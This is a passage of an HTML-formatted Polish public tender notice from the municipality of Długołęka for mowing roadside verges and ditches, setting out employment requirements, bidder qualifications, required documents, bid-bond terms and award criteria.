bijakowej.3.2.	Osoby wskazane w ust. 3.1 muszą być zatrudnione przez cały okres świadczenia usług objętych niniejszym zamówieniem.3.3. Zamawiający jest uprawniony do kontroli zatrudnienia osób, o których mowa w ust. 3.1,na każdym etapie trwania umowy.3.4. Na każde żądanie Zamawiającego i w terminie wskazanym przez Zamawiającego –nie dłuższym niż 5 dni roboczych od dnia przekazania Wykonawcy żądania wyrażonegona piśmie lub drogą elektroniczną – Wykonawca przedłoży Zamawiającemu kopie dokumentów potwierdzających fakt zatrudnienia na podstawie umowy o pracę, w szczególności kopie umów o pracę zawartych z osobami, które będą wykonywać czynności wskazanew ust. 3.1 lub kopie dokumentów dotyczących tych osób przekazywanych przez Wykonawcę jako pracodawcę do ZUS.3.5. W przypadku rozwiązania lub wygaśnięcia umowy o pracę z osobami wskazanymi w ust. 3.1, Wykonawca zobowiązany jest dostarczyć Zamawiającemu kopię umowy o pracę zawartejz nowym pracownikiem lub inny dokument potwierdzający fakt zatrudnienia na podstawie umowy o pracę w ciągu 5 dni od dnia zatrudnienia nowego pracownika.3.6. Niezatrudnienie osób zgodnie z ust. 3.1 lub nieprzedłożenie przez Wykonawcę kopii dokumentów potwierdzających fakt zatrudnienia na podstawie umowy o pracę w terminach określonych w ust. 3.4 i 3.5, uważane będzie za niewykonanie przez Wykonawcę obowiązku zatrudnienia osób na podstawie umowy o pracę (ust. 3.1 i 3.2) i tym samym stanowić będzie podstawę do naliczenia przez Zamawiającego kary umownej określonej w §11 ust. 1 pkt 5 Projektu umowy.3.7.	W celu dokonania kontroli spełnienia przez Wykonawcę obowiązku określonego w ust. 3.1 i 3.2 Zamawiający może także przeprowadzić kontrolę na miejscu wykonywania świadczenia.3.8.	W sytuacji, gdy Zamawiający poweźmie wątpliwości, co do sposobu zatrudnienia osób wskazanych w ust. 3.1 może:1)	przeprowadzić kontrolę na miejscu wykonywania świadczenia,2)	zwrócić się o przeprowadzenie kontroli przez Państwową Inspekcję Pracy.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">77314100-5</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów – szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2020-12-15</span> <br /> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w miesiącach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w dniach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data rozpoczęcia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data zakończenia</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'> </TD><TD style='border: 1px solid black;border-collapse: collapse;'>2020-12-15</TD></TR></TABLE> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Wykonawca spełni warunki jeśli wykaże, że:a) w okresie ostatnich trzech lat przed upływem terminu składania ofert, (a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie), wykonał (a w przypadku świadczeń okresowych lub ciągłych również wykonuje) co najmniej jedną usługę o wartości nie mniejszej niż 150 000,00 zł (słownie: sto pięćdziesiąt tysięcy złotych 00/100), obejmującą swym zakresem usługi w zakresie koszenia trawy w obrębie poboczy i / lub innych elementów pasa drogowego (na potrzeby niniejszego zamówienia rozumianych jako skarpy, przeciwskarpy lub rowy) oraz potwierdzi, że wykazana usługa została wykonana należycie.UWAGA 1:W przypadku wykazania zadania obejmującego różny zakres usług niż tylko ten wymieniony powyżej, należy wskazać (uszczegółowić) w wykazie usług (załącznik nr 6 do SIWZ) zakres (rodzaj i wartość) wykonanej usługi w celu umożliwienia Zamawiającemu weryfikacji spełniania warunków zamówienia zawartych w SIWZ.UWAGA 2:Dla wartości wyrażonych w innej walucie niż PLN, Zamawiający przyjmie przelicznik według średniego kursu NBP ogłoszonego w dniu wszczęcia postępowania.UWAGA 3:W przypadku składania przez Wykonawcę ofert na obie części zamówienia, Zamawiający dopuszcza, aby dla wykazania spełniania warunku określonego w rozdz. IV ust. 1 pkt 3 lit. a, Wykonawca miał możliwość wykazania tych samych umów / kontraktów dla obu części bez ich sumowania.b)	dysponuje następującymi narzędziami i urządzeniami technicznymi w ilości co najmniej:-	2 szt. ciągników kołowych,-	2 szt. przyczep ciągnikowych,-	2 szt. samochodów samowyładowczych do 5 t,-	2 szt. kosiarek ciągnikowych,-	2 szt. kosiarek spalinowych,-	4 szt. kos spalinowych,-	2 szt. kosiarek bijakowych.UWAGA:W przypadku składania ofert na dwie części zamówienia, Wykonawca winien wykazać się dwukrotnością wskazanych powyżej ilości narzędzi i urządzeń technicznych, np. 4 szt. ciągników kołowych, 8 szt. kos spalinowych, itd.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow"></span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">Na wezwanie Zamawiającego, Wykonawca, którego oferta została najwyżej oceniona, zobowiązany jest do złożenia następujących oświadczeń i dokumentów:1)	odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji – w celu potwierdzenia braku podstaw do wykluczenia o jakich mowa w art. 24 ust. 5 pkt 1 ustawy (ad. rozdział V ust. 2 SIWZ).1.1)	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt 1 składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości.1.2)	Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przez organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy lub miejsce zamieszkania tej osoby.Dokumenty / oświadczenia powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">Na wezwanie Zamawiającego, Wykonawca, którego oferta została najwyżej oceniona, zobowiązany jest do złożenia następujących oświadczeń i dokumentów:2)	wykazu usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonanewraz z załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane – w celu potwierdzenia spełnienia przez Wykonawcę warunku udziału w postępowaniu (wzór wykazu stanowi załącznik nr 6 do SIWZ);3)	wykazu narzędzi i urządzeń technicznych dostępnych Wykonawcy w celu wykonania niniejszego zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami – w celu potwierdzenia spełnienia przez Wykonawcę warunku udziału w postępowaniu (wzór wykazu stanowi załącznik nr 7 (dla pakietu nr 1) i / lub 7a (dla pakietu nr 2) do SIWZ);</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">Treść oferty stanowi wypełniony Formularz ofertowy (załącznik nr 1 do SIWZ), który wymaga formy pisemnej (tj. opatrzonej własnoręcznym podpisem osoby upoważnionej do reprezentowania Wykonawcy).Wraz z ofertą muszą być złożone:1)	oświadczenia wymagane postanowieniami rozdz. VI ust. 1 SIWZ,2)	oświadczenia wymagane postanowieniami rozdz. VII ust. 6 SIWZ, w przypadku gdy Wykonawca polega na zasobach innych podmiotów,3)	zobowiązanie wymagane postanowieniami rozdz. VII ust. 2 SIWZ w celu potwierdzenia spełnienia warunków udziału w postępowaniu, w przypadku gdy Wykonawca polegana zasobach innych podmiotów,4)	pełnomocnictwo do podpisania oferty, o ile nie wynika z innych dokumentów załączonych przez Wykonawcę (pełnomocnictwo powinno być przedłożone w oryginale lub kopii poświadczonej notarialnie – art. 99 § 1 Kodeksu cywilnego),5)	dokumenty, z których wynika prawo do podpisania oferty (oryginał lub kopia potwierdzona przez notariusza), względnie – do podpisania innych dokumentów składanych wraz z ofertą, chyba, że Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r.o informatyzacji działalności podmiotów realizujących zadania publiczne (tekst jednolity Dz. U. z 2019 r. poz. 700 ze zm.), a Wykonawca wskazał to w złożonej ofercie (informacje takie należy umieścić w formularzu ofertowym w pkt 9),6)	dowód wpłaty wadium (w przypadku wpłaty pieniężnej zaleca się załączenie potwierdzenia wpłaty – dokumentu potwierdzającego wpłatę przelewem środków finansowych na rachunek Zamawiającego, w przypadku pozostałych form wniesienia wadium, np. gwarancji bankowej czy ubezpieczeniowej – kopię dokumentu; sposób i zasady wniesienia wadium określone zostały w rozdz. XIII SIWZ).</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">1.	Każda oferta musi być zabezpieczona wadium. Wykonawca przystępujący do przetargu zobowiązany jest wnieść wadium:a)	dla części I (pakiet nr 1): w wysokości 7 000,00 zł (słownie: siedem tysięcy złotych 00/100)b)	dla części II (pakiet nr 2): w wysokości 5 000,00 zł (słownie: pięć tysięcy złotych 00/100)2.	Wadium może być wniesione w następujących formach:1)	w pieniądzu;2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;3)	gwarancjach bankowych;4)	gwarancjach ubezpieczeniowych;5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawyz dnia 09 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jednolity Dz. U. z 2019 r. poz. 310 ze zm.).3.	Wadium wnosi się przed upływem terminu składania ofert.4.	Wadium wnoszone w formie poręczeń i gwarancji należy złożyć w postaci oryginału dokumentu w kasie Urzędu Gminy Długołęka – w nieprzekraczalnym terminie (tj. dzień i godzina) wyznaczonym na składanie ofert. Kopię dokumentu zaleca się załączyć do oferty (za wyjątkiem ust. 5).5.	Jeśli Wykonawca prześle ofertę pocztą / przekaże za pośrednictwem kuriera lub innej osoby, kopię dowodu wniesienia wadium zaleca się załączyć do oferty, natomiast oryginał umieścićw oznaczonej kopercie oryginał dowodu wniesienia wadium.6.	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego:	Bank Spółdzielczy w Oleśnicy – Oddział w Długołęce	nr rachunku: 11 9584 1021 2003 0300 0101 0004	tytułem: [ZP.271.8.2020.KP] Przetarg nieograniczony na koszenie poboczy i innych elementów (skarpa, przeciwskarpa, rowy) pasa drogowego dróg utwardzonych i gruntowych zlokalizowanych na terenie gminy Długołęka – pakiet nr … (wskazać odpowiednio)	tak, by na dzień i godzinę wyznaczoną na składanie ofert znajdowało się na rachunku bankowym Zamawiającego.UWAGA:Ze względu na ryzyko związane z czasem trwania okresu rozliczeń międzybankowych Zamawiający zaleca dokonanie przelewu ze stosownym wyprzedzeniem.7.	Dowód potwierdzający złożenie wadium zaleca się załączyć do oferty.8.	Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym. 9.	Utratę wadium określa art. 46 ust. 4a i ust. 5 ustawy Prawo zamówień publicznych.</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena oferty brutto</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Termin płatności faktury VAT</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: 